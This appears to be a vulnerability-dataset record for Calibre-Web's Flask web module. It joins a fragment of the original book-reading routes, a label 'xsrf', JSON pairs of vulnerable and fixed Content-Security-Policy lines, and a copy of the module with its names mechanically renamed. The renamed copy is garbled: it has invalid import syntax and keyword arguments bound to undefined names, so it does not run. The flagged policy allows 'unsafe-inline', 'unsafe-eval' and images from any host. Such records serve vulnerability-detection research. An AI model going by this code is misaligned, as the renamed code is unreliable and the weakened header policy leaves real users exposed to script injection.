if feature_support['oauth'] and config.config_login_type == 2:
oauth_status = get_oauth_status()
local_oauth_check = oauth_check
else:
oauth_status = None
local_oauth_check = {}
if request.method == "POST":
change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages)
return render_title_template("user_edit.html",
translations=translations,
profile=1,
languages=languages,
content=current_user,
kobo_support=kobo_support,
title=_(u"%(name)s's profile", name=current_user.name),
page="me",
registered_oauth=local_oauth_check,
oauth_status=oauth_status)
# ###################################Show single book ##################################################################
@web.route("/read/<int:book_id>/<book_format>")
@login_required_if_no_ano
@viewer_required
def read_book(book_id, book_format):
book = calibre_db.get_filtered_book(book_id)
if not book:
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
return redirect(url_for("web.index"))
# check if book has bookmark
bookmark = None
if current_user.is_authenticated:
bookmark = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
ub.Bookmark.book_id == book_id,
ub.Bookmark.format == book_format.upper())).first()
if book_format.lower() == "epub":
log.debug(u"Start epub reader for %d", book_id)
return render_title_template('read.html', bookid=book_id, title=book.title, bookmark=bookmark)
elif book_format.lower() == "pdf":
log.debug(u"Start pdf reader for %d", book_id)
return render_title_template('readpdf.html', pdffile=book_id, title=book.title)
elif book_format.lower() == "txt":
log.debug(u"Start txt reader for %d", book_id)
return render_title_template('readtxt.html', txtfile=book_id, title=book.title)
elif book_format.lower() == "djvu":
log.debug(u"Start djvu reader for %d", book_id)
return render_title_template('readdjvu.html', djvufile=book_id, title=book.title)
else:
for fileExt in constants.EXTENSIONS_AUDIO:
if book_format.lower() == fileExt:
entries = calibre_db.get_filtered_book(book_id)
log.debug(u"Start mp3 listening for %d", book_id)
return render_title_template('listenmp3.html', mp3file=book_id, audioformat=book_format.lower(),
entry=entries, bookmark=bookmark)
for fileExt in ["cbr", "cbt", "cbz"]:
if book_format.lower() == fileExt:
all_name = str(book_id)
title = book.title
if len(book.series):
title = title + " - " + book.series[0].name
if book.series_index:
title = title + " #" + '{0:.2f}'.format(book.series_index).rstrip('0').rstrip('.')
log.debug(u"Start comic reader for %d", book_id)
return render_title_template('readcbr.html', comicfile=all_name, title=title,
extension=fileExt)
log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
@web.route("/book/<int:book_id>")
@login_required_if_no_ano
def show_book(book_id):
entries = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
if entries:
for index in range(0, len(entries.languages)):
entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entries.languages[
index].lang_code)
#try:
# entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), LC.parse(entries.languages[index].lang_code)
# .get_language_name(get_locale())
#except UnknownLocaleError:
# entries.languages[index].language_name = _(
# isoLanguages.get(part3=entries.languages[index].lang_code).name)
cc = get_cc_columns(filter_config_custom_read=True)
book_in_shelfs = []
shelfs = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).all()
for entry in shelfs:
book_in_shelfs.append(entry.shelf)
if not current_user.is_anonymous:
if not config.config_read_column:
matching_have_read_book = ub.session.query(ub.ReadBook). \
filter(and_(ub.ReadBook.user_id == int(current_user.id), ub.ReadBook.book_id == book_id)).all()
have_read = len(
matching_have_read_book) > 0 and matching_have_read_book[0].read_status == ub.ReadBook.STATUS_FINISHED
else:
try:
matching_have_read_book = getattr(entries, 'custom_column_' + str(config.config_read_column))
have_read = len(matching_have_read_book) > 0 and matching_have_read_book[0].value
except (KeyError, AttributeError):
log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
have_read = None
archived_book = ub.session.query(ub.ArchivedBook).\
filter(and_(ub.ArchivedBook.user_id == int(current_user.id),
ub.ArchivedBook.book_id == book_id)).first()
is_archived = archived_book and archived_book.is_archived
else:
have_read = None
is_archived = None
entries.tags = sort(entries.tags, key=lambda tag: tag.name)
entries = calibre_db.order_authors(entries)
kindle_list = check_send_to_kindle(entries)
reader_list = check_read_formats(entries)
audioentries = []
for media_format in entries.data:
if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
audioentries.append(media_format.format.lower())
return render_title_template('detail.html',
entry=entries,
audioentries=audioentries,
cc=cc,
is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
title=entries.title,
books_shelfs=book_in_shelfs,
have_read=have_read,
is_archived=is_archived,
kindle_list=kindle_list,
reader_list=reader_list,
page="book")
else:
log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
| xsrf | {
"code": [
" resp.headers['Content-Security-Policy'] = \"default-src 'self' 'unsafe-inline' 'unsafe-eval';\"",
" resp.headers['Content-Security-Policy'] += \"img-src * data:\""
],
"line_no": [
87,
89
]
} | {
"code": [
" resp.headers['Content-Security-Policy'] = \"default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:\"",
" resp.headers['Content-Security-Policy'] += \" *\""
],
"line_no": [
87,
89
]
} |
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import .format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as VAR_91
from flask_babel import gettext as _
from flask_login import .login_user, logout_user, login_required, VAR_87
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import .login_required_if_no_ano
from .render_template import render_title_template
VAR_0 = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo)
}
try:
from .oauth_bb import .oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
VAR_0['oauth'] = True
except ImportError:
VAR_0['oauth'] = False
VAR_100 = {}
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
try:
from natsort import natsorted as VAR_7
except ImportError:
VAR_7 = sorted # Just use regular VAR_7 then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def FUNC_0(VAR_1):
VAR_1.headers['Content-Security-Policy'] = "default-src 'self' 'unsafe-inline' 'unsafe-eval';"
if request.endpoint == "editbook.edit_book":
VAR_1.headers['Content-Security-Policy'] += "img-src * VAR_8:"
VAR_1.headers['X-Content-Type-Options'] = 'nosniff'
VAR_1.headers['X-Frame-Options'] = 'SAMEORIGIN'
VAR_1.headers['X-XSS-Protection'] = '1; mode=block'
VAR_1.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
return VAR_1
VAR_2 = Blueprint('web', __name__)
VAR_3 = logger.create()
def FUNC_1(VAR_4):
@wraps(VAR_4)
def FUNC_71(*VAR_49, **VAR_50):
if VAR_87.role_download():
return VAR_4(*VAR_49, **VAR_50)
abort(403)
return FUNC_71
def FUNC_2(VAR_4):
@wraps(VAR_4)
def FUNC_71(*VAR_49, **VAR_50):
if VAR_87.role_viewer():
return VAR_4(*VAR_49, **VAR_50)
abort(403)
return FUNC_71
@VAR_2.route("/ajax/emailstat")
@login_required
def FUNC_3():
VAR_51 = WorkerThread.getInstance().tasks
return jsonify(render_task_status(VAR_51))
@VAR_2.route("/ajax/VAR_99/<int:VAR_5>/<VAR_6>", methods=['POST'])
@login_required
def VAR_99(VAR_5, VAR_6):
VAR_52 = request.form["bookmark"]
ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
ub.Bookmark.book_id == VAR_5,
ub.Bookmark.format == VAR_6)).delete()
if not VAR_52:
ub.session_commit()
return "", 204
VAR_53 = ub.Bookmark(VAR_11=VAR_87.id,
VAR_5=book_id,
format=VAR_6,
VAR_52=bookmark_key)
ub.session.merge(VAR_53)
ub.session_commit("Bookmark for VAR_104 {} in VAR_95 {} created".format(VAR_87.id, VAR_5))
return "", 201
@VAR_2.route("/ajax/toggleread/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_5(VAR_5):
if not config.config_read_column:
VAR_95 = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.book_id == VAR_5)).first()
if VAR_95:
if VAR_95.read_status == ub.ReadBook.STATUS_FINISHED:
VAR_95.read_status = ub.ReadBook.STATUS_UNREAD
else:
VAR_95.read_status = ub.ReadBook.STATUS_FINISHED
else:
VAR_123 = ub.ReadBook(VAR_11=VAR_87.id, VAR_5 = book_id)
VAR_123.read_status = ub.ReadBook.STATUS_FINISHED
VAR_95 = VAR_123
if not VAR_95.kobo_reading_state:
VAR_124 = ub.KoboReadingState(VAR_11=VAR_87.id, VAR_5=book_id)
VAR_124.current_bookmark = ub.KoboBookmark()
VAR_124.statistics = ub.KoboStatistics()
VAR_95.kobo_reading_state = VAR_124
ub.session.merge(VAR_95)
ub.session_commit("Book {} readbit toggled".format(VAR_5))
else:
try:
calibre_db.update_title_sort(config)
VAR_95 = calibre_db.get_filtered_book(VAR_5)
VAR_26 = getattr(VAR_95, 'custom_column_' + str(config.config_read_column))
if len(VAR_26):
VAR_26[0].value = not VAR_26[0].value
calibre_db.session.commit()
else:
VAR_143 = db.cc_classes[config.config_read_column]
VAR_144 = VAR_143(value=1, VAR_95=VAR_5)
calibre_db.session.add(VAR_144)
calibre_db.session.commit()
except (KeyError, AttributeError):
VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
except (OperationalError, InvalidRequestError) as e:
calibre_db.session.rollback()
VAR_3.error(u"Read status could not set: %e", e)
return "Read status could not set: {}".format(e), 400
return ""
@VAR_2.route("/ajax/togglearchived/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_6(VAR_5):
VAR_54 = ub.session.query(ub.ArchivedBook).filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
ub.ArchivedBook.book_id == VAR_5)).first()
if VAR_54:
VAR_54.is_archived = not VAR_54.is_archived
VAR_54.last_modified = datetime.utcnow()
else:
VAR_54 = ub.ArchivedBook(VAR_11=VAR_87.id, VAR_5=book_id)
VAR_54.is_archived = True
ub.session.merge(VAR_54)
ub.session_commit("Book {} archivebit toggled".format(VAR_5))
return ""
@VAR_2.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def FUNC_7():
VAR_55 = request.get_json()
try:
for VAR_113 in VAR_55:
for VAR_111 in VAR_55[VAR_113]:
VAR_87.set_view_property(VAR_113, VAR_111, VAR_55[VAR_113][VAR_111])
except Exception as ex:
VAR_3.error("Could not save view_settings: %r %r: %e", request, VAR_55, ex)
return "Invalid request", 400
return "1", 200
'''
@VAR_2.route("/ajax/getcomic/<int:VAR_5>/<VAR_6>/<int:VAR_9>")
@login_required
def get_comic_book(VAR_5, VAR_6, VAR_9):
VAR_95 = calibre_db.get_book(VAR_5)
if not VAR_95:
return "", 204
else:
for bookformat in VAR_95.data:
if bookformat.format.lower() == VAR_6.lower():
cbr_file = os.path.join(config.config_calibre_dir, VAR_95.path, bookformat.name) + "." + VAR_6
if VAR_6 in ("cbr", "rar"):
if VAR_0['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = VAR_7(rf.namelist())
extract = lambda VAR_9: rf.read(names[VAR_9])
except:
VAR_3.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
VAR_3.info('Unrar is not supported please install python rarfile extension')
return "", 204
elif VAR_6 in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=VAR_7(zf.namelist())
extract = lambda VAR_9: zf.read(names[VAR_9])
elif VAR_6 in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
names=VAR_7(tf.getnames())
extract = lambda VAR_9: tf.extractfile(names[VAR_9]).read()
else:
VAR_3.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(VAR_9), 'base64').decode()
else:
b64 = extract(VAR_9).encode('base64')
ext = names[VAR_9].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[VAR_9], "page":VAR_9, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
@VAR_2.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_8():
return calibre_db.get_typeahead(db.Authors, request.args.get('q'), ('|', ','))
@VAR_2.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_9():
return calibre_db.get_typeahead(db.Publishers, request.args.get('q'), ('|', ','))
@VAR_2.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_10():
return calibre_db.get_typeahead(db.Tags, request.args.get('q'), tag_filter=tags_filters())
@VAR_2.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_11():
return calibre_db.get_typeahead(db.Series, request.args.get('q'))
@VAR_2.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_12():
VAR_56 = (request.args.get('q') or '').lower()
VAR_57 = isoLanguages.get_language_names(get_locale())
VAR_58 = [s for key, s in VAR_57.items() if s.lower().startswith(VAR_56.lower())]
if len(VAR_58) < 5:
VAR_63 = [s for key, s in VAR_57.items() if VAR_56 in s.lower()]
VAR_58.extend(VAR_63[0:(5 - len(VAR_58))])
entries_start = list(set(VAR_58))
VAR_59 = json.dumps([dict(VAR_13=r) for r in VAR_58[0:5]])
return VAR_59
@VAR_2.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def FUNC_13():
VAR_60 = {'tags': []}
VAR_21 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
VAR_61 = request.args.get('author_name') or ''
VAR_62 = request.args.get('book_title') or ''
VAR_29 = request.args.getlist('include_tag') or ''
VAR_30 = request.args.getlist('exclude_tag') or ''
VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_61 + "%")),
func.lower(db.Books.title).ilike("%" + VAR_62 + "%"))
if len(VAR_29) > 0:
for tag in VAR_29:
VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
if len(VAR_30) > 0:
for tag in VAR_30:
VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
for VAR_95 in VAR_21:
for tag in VAR_95.tags:
if tag.id not in VAR_60['tags']:
VAR_60['tags'].append(tag.id)
VAR_59 = json.dumps(VAR_60)
return VAR_59
def FUNC_14(VAR_7, VAR_8):
VAR_10 = [db.Books.timestamp.desc()]
if VAR_7 == 'stored':
VAR_7 = VAR_87.get_view_property(VAR_8, 'stored')
else:
VAR_87.set_view_property(VAR_8, 'stored', VAR_7)
if VAR_7 == 'pubnew':
VAR_10 = [db.Books.pubdate.desc()]
if VAR_7 == 'pubold':
VAR_10 = [db.Books.pubdate]
if VAR_7 == 'abc':
VAR_10 = [db.Books.sort]
if VAR_7 == 'zyx':
VAR_10 = [db.Books.sort.desc()]
if VAR_7 == 'new':
VAR_10 = [db.Books.timestamp.desc()]
if VAR_7 == 'old':
VAR_10 = [db.Books.timestamp]
if VAR_7 == 'authaz':
VAR_10 = [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index]
if VAR_7 == 'authza':
VAR_10 = [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
if VAR_7 == 'seriesasc':
VAR_10 = [db.Books.series_index.asc()]
if VAR_7 == 'seriesdesc':
VAR_10 = [db.Books.series_index.desc()]
return VAR_10
def FUNC_15(VAR_8, VAR_7, VAR_5, VAR_9):
VAR_10 = FUNC_14(VAR_7, VAR_8)
if VAR_8 == "rated":
return FUNC_16(VAR_9, VAR_5, VAR_10=order)
elif VAR_8 == "discover":
return FUNC_17(VAR_9, VAR_5)
elif VAR_8 == "unread":
return FUNC_27(VAR_9, False, VAR_10=order)
elif VAR_8 == "read":
return FUNC_27(VAR_9, True, VAR_10=order)
elif VAR_8 == "hot":
return FUNC_18(VAR_9)
elif VAR_8 == "download":
return FUNC_19(VAR_9, VAR_10, VAR_5)
elif VAR_8 == "author":
return FUNC_20(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "publisher":
return FUNC_21(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "series":
return FUNC_22(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "ratings":
return FUNC_23(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "formats":
return FUNC_24(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "category":
return FUNC_25(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "language":
return FUNC_26(VAR_9, VAR_5, VAR_10)
elif VAR_8 == "archived":
return FUNC_28(VAR_9, VAR_10)
elif VAR_8 == "search":
VAR_17 = (request.args.get('query') or '')
VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
return FUNC_30(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
elif VAR_8 == "advsearch":
VAR_17 = json.loads(VAR_91['query'])
VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
return FUNC_57(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
else:
VAR_150 = VAR_8 or "newest"
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=_(u"Books"), VAR_9=VAR_150)
def FUNC_16(VAR_9, VAR_5, VAR_10):
if VAR_87.check_visibility(constants.SIDEBAR_BEST_RATED):
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.ratings.any(db.Ratings.rating > 9),
VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
id=VAR_5, VAR_149=_(u"Top Rated Books"), VAR_9="rated")
else:
abort(404)
def FUNC_17(VAR_9, VAR_5):
if VAR_87.check_visibility(constants.SIDEBAR_RANDOM):
VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, [func.randomblob(2)])
VAR_65 = Pagination(1, config.config_books_per_page, config.config_books_per_page)
return render_title_template('discover.html', VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
VAR_149=_(u"Discover (Random Books)"), VAR_9="discover")
else:
abort(404)
def FUNC_18(VAR_9):
if VAR_87.check_visibility(constants.SIDEBAR_HOT):
if VAR_87.show_detail_random():
VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
VAR_68 = false()
VAR_79 = int(int(config.config_books_per_page) * (VAR_9 - 1))
VAR_101 = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
VAR_102 = VAR_101.offset(VAR_79).limit(config.config_books_per_page)
VAR_63 = list()
for VAR_95 in VAR_102:
VAR_125 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
db.Books.id == VAR_95.Downloads.book_id).first()
if VAR_125:
VAR_63.append(VAR_125)
else:
ub.delete_download(VAR_95.Downloads.book_id)
VAR_103 = VAR_63.__len__()
VAR_65 = Pagination(VAR_9, config.config_books_per_page, VAR_103)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=_(u"Hot Books (Most Downloaded)"), VAR_9="hot")
else:
abort(404)
def FUNC_19(VAR_9, VAR_10, VAR_11):
if VAR_87.role_admin():
VAR_11 = int(VAR_11)
else:
VAR_11 = VAR_87.id
if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD):
if VAR_87.show_detail_random():
VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
VAR_68 = false()
VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9,
0,
db.Books,
ub.Downloads.user_id == VAR_11,
VAR_10,
ub.Downloads, db.Books.id == ub.Downloads.book_id)
for VAR_95 in VAR_63:
if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.filter(db.Books.id == VAR_95.id).first():
ub.delete_download(VAR_95.id)
VAR_104 = ub.session.query(ub.User).filter(ub.User.id == VAR_11).first()
return render_title_template('index.html',
VAR_68=random,
VAR_63=VAR_63,
VAR_65=pagination,
id=VAR_11,
VAR_149=_(u"Downloaded VAR_127 by %(VAR_104)s",VAR_104=VAR_104.name),
VAR_9="download")
else:
abort(404)
def FUNC_20(VAR_9, VAR_12, VAR_10):
VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.authors.any(db.Authors.id == VAR_12),
[VAR_10[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
if VAR_63 is None or not len(VAR_63):
flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
if constants.sqlalchemy_version2:
VAR_105 = calibre_db.session.get(db.Authors, VAR_12)
else:
VAR_105 = calibre_db.session.query(db.Authors).get(VAR_12)
VAR_36 = VAR_105.name.replace('|', ',')
VAR_66 = None
VAR_67 = []
if services.goodreads_support and config.config_use_goodreads:
VAR_66 = services.goodreads_support.get_author_info(VAR_36)
VAR_67 = services.goodreads_support.get_other_books(VAR_66, VAR_63)
return render_title_template('author.html', VAR_63=VAR_63, VAR_65=pagination, id=VAR_12,
VAR_149=_(u"Author: %(VAR_13)s", VAR_13=VAR_36), VAR_105=VAR_66,
VAR_67=other_books, VAR_9="author")
def FUNC_21(VAR_9, VAR_5, VAR_10):
VAR_38 = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == VAR_5).first()
if VAR_38:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.publishers.any(db.Publishers.id == VAR_5),
[db.Series.name, VAR_10[0], db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
VAR_149=_(u"Publisher: %(VAR_13)s", VAR_13=VAR_38.name), VAR_9="publisher")
else:
abort(404)
def FUNC_22(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Series).filter(db.Series.id == VAR_5).first()
if VAR_13:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.series.any(db.Series.id == VAR_5),
[VAR_10[0]])
return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
VAR_149=_(u"Series: %(serie)s", serie=VAR_13.name), VAR_9="series")
else:
abort(404)
def FUNC_23(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == VAR_5).first()
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.ratings.any(db.Ratings.id == VAR_5),
[VAR_10[0]])
if VAR_13 and VAR_13.rating <= 10:
return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
VAR_149=_(u"Rating: %(rating)s stars", rating=int(VAR_13.rating / 2)), VAR_9="ratings")
else:
abort(404)
def FUNC_24(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Data).filter(db.Data.format == VAR_5.upper()).first()
if VAR_13:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.data.any(db.Data.format == VAR_5.upper()),
[VAR_10[0]])
return render_title_template('index.html', VAR_68=random, VAR_65=pagination, VAR_63=VAR_63, id=VAR_5,
VAR_149=_(u"File format: %(format)s", format=VAR_13.format), VAR_9="formats")
else:
abort(404)
def FUNC_25(VAR_9, VAR_5, VAR_10):
VAR_13 = calibre_db.session.query(db.Tags).filter(db.Tags.id == VAR_5).first()
if VAR_13:
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.tags.any(db.Tags.id == VAR_5),
[VAR_10[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_5,
VAR_149=_(u"Category: %(VAR_13)s", VAR_13=VAR_13.name), VAR_9="category")
else:
abort(404)
def FUNC_26(VAR_9, VAR_13, VAR_10):
try:
VAR_106 = isoLanguages.get_language_name(get_locale(), VAR_13)
except KeyError:
abort(404)
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
db.Books.languages.any(db.Languages.lang_code == VAR_13),
[VAR_10[0]])
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination, id=VAR_13,
VAR_149=_(u"Language: %(VAR_13)s", VAR_13=VAR_106), VAR_9="language")
def FUNC_27(VAR_9, VAR_14, VAR_15=False, VAR_10=None):
VAR_10 = VAR_10 or []
if not config.config_read_column:
if VAR_14:
VAR_126 = and_(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
VAR_126 = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
VAR_126,
VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
else:
try:
if VAR_14:
VAR_126 = db.cc_classes[config.config_read_column].value == True
else:
VAR_126 = coalesce(db.cc_classes[config.config_read_column].value, False) != True
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
db.Books,
VAR_126,
VAR_10,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
db.cc_classes[config.config_read_column])
except (KeyError, AttributeError):
VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
if not VAR_15:
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return redirect(url_for("web.index"))
if VAR_15:
return VAR_63, VAR_65
else:
if VAR_14:
VAR_13 = _(u'Read Books') + ' (' + str(VAR_65.total_count) + ')'
VAR_72 = "read"
else:
VAR_13 = _(u'Unread Books') + ' (' + str(VAR_65.total_count) + ')'
VAR_72 = "unread"
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_28(VAR_9, VAR_10):
VAR_10 = VAR_10 or []
VAR_69 = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.user_id == int(VAR_87.id))
.filter(ub.ArchivedBook.is_archived == True)
.all()
)
VAR_70 = [VAR_54.book_id for VAR_54 in VAR_69]
VAR_71 = db.Books.id.in_(VAR_70)
VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage_with_archived_books(VAR_9, 0,
db.Books,
VAR_71,
VAR_10,
allow_show_archived=True)
VAR_13 = _(u'Archived Books') + ' (' + str(len(VAR_70)) + ')'
VAR_72 = "archived"
return render_title_template('index.html', VAR_68=random, VAR_63=VAR_63, VAR_65=pagination,
VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_29(VAR_16):
VAR_41 = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
VAR_73 = calibre_db.session.query(db.Series)\
.join(db.books_series_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series'))\
.order_by(db.Series.name)\
.filter(calibre_db.common_filters()).all()
VAR_74 = ub.session.query(ub.Shelf)\
.filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(VAR_87.id)))\
.order_by(ub.Shelf.name).all()
VAR_75 = calibre_db.session.query(db.Data)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(db.Data.format)\
.order_by(db.Data.format).all()
if VAR_87.filter_language() == u"all":
VAR_48 = calibre_db.speaking_language()
else:
VAR_48 = None
return render_title_template('search_form.html', VAR_41=tags, VAR_48=languages, VAR_75=extensions,
VAR_73=series,VAR_74=shelves, VAR_149=_(u"Advanced Search"), VAR_16=cc, VAR_9="advsearch")
def FUNC_30(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
